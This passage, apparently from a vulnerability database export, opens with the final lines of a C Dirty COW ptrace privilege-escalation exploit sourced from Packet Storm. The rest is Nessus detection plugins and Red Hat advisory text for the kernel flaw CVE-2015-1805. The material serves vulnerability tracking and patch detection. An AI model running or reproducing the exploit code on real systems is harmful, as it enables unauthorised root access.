loop to 10K divided by l \nfor(o=0;o<l;o++)//////////////////////// repeat for each byte \nfor(u=0;u<10000;u++)////////////////// try 10K times each time \nc+=ptrace(PTRACE_POKETEXT ,// inject into memory \npid ,// process id \nmap+o ,// address \n*((long*)(argv[2]+o))) ;// value \nprintf(\"ptrace %d\\n\\n\",c) ;// sum of error code \n}// otherwise \nelse {// child \npthread_create(&pth ,// create new thread \nNULL ,// null \nmadviseThread ,// run madviseThred \nNULL) ;// null \nptrace(PTRACE_TRACEME) ;// stat ptrace on child \nkill(getpid(),SIGSTOP) ;// signal parent \npthread_join(pth,NULL) ;// wait for thread \n}// / child \nreturn 0 ;// return \n}// / entrypoint \n////////////////////////////////////////////// \n \n \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/139922/dirtycowptrace-escalate.txt"}], "nessus": [{"lastseen": "2021-02-01T05:32:07", "description": "Updated kernel packages that fix one security issue and one bug are\nnow available for Red Hat Enterprise Linux 5.9 Advanced Update\nSupport.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* It was found that the Linux kernel's implementation of vectored pipe\nread and write functionality did not take into account the I/O vectors\nthat were already processed when retrying after a failed atomic access\noperation, potentially resulting in memory corruption due to an I/O\nvector array overrun. A local, unprivileged user could use this flaw\nto crash the system or, potentially, escalate their privileges on the\nsystem. 
(CVE-2015-1805, Important)\n\nThe security impact of this issue was discovered by Red Hat.\n\nThis update also fixes the following bug :\n\n* Previously, the signal delivery paths did not clear the TS_USEDFPU\nflag, which could confuse the switch_to() function and lead to\nfloating-point unit (FPU) corruption. With this update, TS_USEDFPU is\ncleared as expected, and FPU is no longer under threat of corruption.\n(BZ#1214239)\n\nAll kernel users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. The system\nmust be rebooted for this update to take effect.", "edition": 30, "published": "2015-06-17T00:00:00", "title": "RHEL 5 : kernel (RHSA-2015:1120)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1805"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-PAE-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common", "cpe:/o:redhat:enterprise_linux:5.9", "p-cpe:/a:redhat:enterprise_linux:kernel-PAE-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debug", "p-cpe:/a:redhat:enterprise_linux:kernel-headers", "p-cpe:/a:redhat:enterprise_linux:kernel-xen-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel", "p-cpe:/a:redhat:enterprise_linux:kernel-xen", "p-cpe:/a:redhat:enterprise_linux:kernel-PAE", "p-cpe:/a:redhat:enterprise_linux:kernel-xen-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-doc"], "id": "REDHAT-RHSA-2015-1120.NASL", "href": "https://www.tenable.com/plugins/nessus/84225", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:1120. 
The system\nmust be rebooted for this update to take effect.", "edition": 30, "published": "2015-06-03T00:00:00", "title": "RHEL 5 : kernel (RHSA-2015:1042)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1805"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:kernel-PAE-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common", "p-cpe:/a:redhat:enterprise_linux:kernel-PAE-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debug", "p-cpe:/a:redhat:enterprise_linux:kernel-headers", "p-cpe:/a:redhat:enterprise_linux:kernel-xen-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel", "p-cpe:/a:redhat:enterprise_linux:kernel", "p-cpe:/a:redhat:enterprise_linux:kernel-xen", "p-cpe:/a:redhat:enterprise_linux:kernel-PAE", "p-cpe:/a:redhat:enterprise_linux:kernel-xen-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-doc"], "id": "REDHAT-RHSA-2015-1042.NASL", "href": "https://www.tenable.com/plugins/nessus/83968", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:1042. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83968);\n script_version(\"2.15\");\n script_cvs_date(\"Date: 2019/10/24 15:35:39\");\n\n script_cve_id(\"CVE-2015-1805\");\n script_bugtraq_id(74951);\n script_xref(name:\"RHSA\", value:\"2015:1042\");\n\n script_name(english:\"RHEL 5 : kernel (RHSA-2015:1042)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix one security issue and several bugs\nare now available for Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* It was found that the Linux kernel's implementation of vectored pipe\nread and write functionality did not take into account the I/O vectors\nthat were already processed when retrying after a failed atomic access\noperation, potentially resulting in memory corruption due to an I/O\nvector array overrun. A local, unprivileged user could use this flaw\nto crash the system or, potentially, escalate their privileges on the\nsystem. (CVE-2015-1805, Important)\n\nThe security impact of this issue was discovered by Red Hat.\n\nThis update fixes the following bugs :\n\n* Due to a bug in the lpfc_device_reset_handler() function, a scsi\ncommand timeout could lead to a system crash. 
With this update,\nlpfc_device_reset_handler recovers storage without crashing.\n(BZ#1070964)\n\n* Due to the code decrementing the reclaim_in_progress counter without\nhaving incremented it first, severe spinlock contention occurred in\nthe shrink_zone() function even though the vm.max_reclaims_in_progress\nfeature was set to 1. This update provides a patch fixing the\nunderlying source code, and spinlock contention no longer occurs in\nthis scenario. (BZ#1164105)\n\n* A TCP socket using SACK that had a retransmission but recovered from\nit, failed to reset the retransmission timestamp. As a consequence, on\ncertain connections, if a packet had to be re-transmitted, the\nretrans_stamp variable was only cleared when the next acked packet was\nreceived. This could lead to an early abortion of the TCP connection\nif this next packet also got lost. With this update, the socket clears\nretrans_stamp when the recovery is completed, thus fixing the bug.\n(BZ#1205521)\n\n* Previously, the signal delivery paths did not clear the TS_USEDFPU\nflag, which could cause problems in the switch_to() function and lead\nto floating-point unit (FPU) corruption. With this update, TS_USEDFPU\nis cleared as expected, and FPU is no longer under threat of\ncorruption. (BZ#1193505)\n\n* A race condition in the exit_sem() function previously caused the\nsemaphore undo list corruption. As a consequence, a kernel crash could\noccur. The corruption in the semaphore undo list has been fixed, and\nthe kernel no longer crashes in this situation. (BZ#1124574)\n\n* Previously, when running the 'virsh blockresize [Device] [Newsize]'\ncommand to resize the disk, the new size was not reflected in a Red\nHat Enterprise Linux 5 Virtual Machine (VM). With this update, the new\nsize is now reflected online immediately in a Red Hat Enterprise Linux\n5 VM so it is no longer necessary to reboot the VM to see the new disk\nsize. 
(BZ#1200855)\n\nAll kernel users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. The system\nmust be rebooted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:1042\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1805\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-PAE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-PAE-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-PAE-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:1042\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-2.6.18-406.el5\")) flag++;\n if 
(rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-PAE-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-PAE-debuginfo-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-PAE-devel-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-debug-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-debug-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-debug-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-debug-debuginfo-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-debug-debuginfo-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-debug-devel-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-debug-devel-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-debug-devel-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-debuginfo-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-debuginfo-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-debuginfo-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-debuginfo-common-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-debuginfo-common-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", 
reference:\"kernel-devel-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-devel-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-devel-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"kernel-doc-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"kernel-headers-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-headers-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-headers-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-kdump-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-kdump-debuginfo-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-kdump-devel-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-xen-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-xen-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-xen-debuginfo-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-xen-devel-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-xen-devel-2.6.18-406.el5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-PAE / kernel-PAE-debuginfo / kernel-PAE-devel / etc\");\n }\n}\n", "cvss": 
{"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-06T13:44:54", "description": "Updated kernel packages that fix one security issue and two bugs are\nnow available for Red Hat Enterprise Linux 6.4 Advanced Update\nSupport.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* It was found that the Linux kernel's implementation of vectored pipe\nread and write functionality did not take into account the I/O vectors\nthat were already processed when retrying after a failed atomic access\noperation, potentially resulting in memory corruption due to an I/O\nvector array overrun. A local, unprivileged user could use this flaw\nto crash the system or, potentially, escalate their privileges on the\nsystem. (CVE-2015-1805, Important)\n\nThe security impact of this issue was discovered by Red Hat.\n\nThis update also fixes the following bugs :\n\n* The backlog data could previously not be consumed when the\naudit_log_start() function was running even if audit_log_start()\ncalled the wait_for_auditd() function to consume it. As only auditd\ncould consume the backlog data, audit_log_start() terminated\nunexpectedly. Consequently, the system became unresponsive until the\nbacklog timeout was up. With this update, audit_log_start() no longer\nterminates and the system shuts down and reboots gracefully in a\ntimely manner. (BZ#1140489)\n\n* Direct I/O writes extending a parallel file could previously race to\nupdate the size of the file. If the writes executed in the\nout-of-order manner, the file size could move backwards and push a\npreviously completed write beyond EOF, causing it to be lost. 
With\nthis update, file size updates are always executed in appropriate\norder, thus fixing this bug. (BZ#1218497)\n\nAll kernel users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. The system\nmust be rebooted for this update to take effect.", "edition": 31, "published": "2015-07-08T00:00:00", "title": "RHEL 6 : kernel (RHSA-2015:1211)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1805"], "modified": "2015-07-08T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:redhat:enterprise_linux:kernel-firmware", "p-cpe:/a:redhat:enterprise_linux:kernel-devel", "cpe:/o:redhat:enterprise_linux:6.4", "p-cpe:/a:redhat:enterprise_linux:kernel-debug", "p-cpe:/a:redhat:enterprise_linux:kernel-headers", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo", "p-cpe:/a:redhat:enterprise_linux:perf-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel", "p-cpe:/a:redhat:enterprise_linux:python-perf", "p-cpe:/a:redhat:enterprise_linux:perf", "p-cpe:/a:redhat:enterprise_linux:kernel-doc"], "id": "REDHAT-RHSA-2015-1211.NASL", "href": "https://www.tenable.com/plugins/nessus/84610", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:1211. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84610);\n script_version(\"2.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/05\");\n\n script_cve_id(\"CVE-2015-1805\");\n script_bugtraq_id(74951);\n script_xref(name:\"RHSA\", value:\"2015:1211\");\n\n script_name(english:\"RHEL 6 : kernel (RHSA-2015:1211)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Updated kernel packages that fix one security issue and two bugs are\nnow available for Red Hat Enterprise Linux 6.4 Advanced Update\nSupport.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* It was found that the Linux kernel's implementation of vectored pipe\nread and write functionality did not take into account the I/O vectors\nthat were already processed when retrying after a failed atomic access\noperation, potentially resulting in memory corruption due to an I/O\nvector array overrun. A local, unprivileged user could use this flaw\nto crash the system or, potentially, escalate their privileges on the\nsystem. (CVE-2015-1805, Important)\n\nThe security impact of this issue was discovered by Red Hat.\n\nThis update also fixes the following bugs :\n\n* The backlog data could previously not be consumed when the\naudit_log_start() function was running even if audit_log_start()\ncalled the wait_for_auditd() function to consume it. 
As only auditd\ncould consume the backlog data, audit_log_start() terminated\nunexpectedly. Consequently, the system became unresponsive until the\nbacklog timeout was up. With this update, audit_log_start() no longer\nterminates and the system shuts down and reboots gracefully in a\ntimely manner. (BZ#1140489)\n\n* Direct I/O writes extending a parallel file could previously race to\nupdate the size of the file. If the writes executed in the\nout-of-order manner, the file size could move backwards and push a\npreviously completed write beyond EOF, causing it to be lost. With\nthis update, file size updates are always executed in appropriate\norder, thus fixing this bug. (BZ#1218497)\n\nAll kernel users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. The system\nmust be rebooted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:1211\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1805\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/08/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6\\.4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.4\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2015-1805\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for RHSA-2015:1211\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:1211\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security 
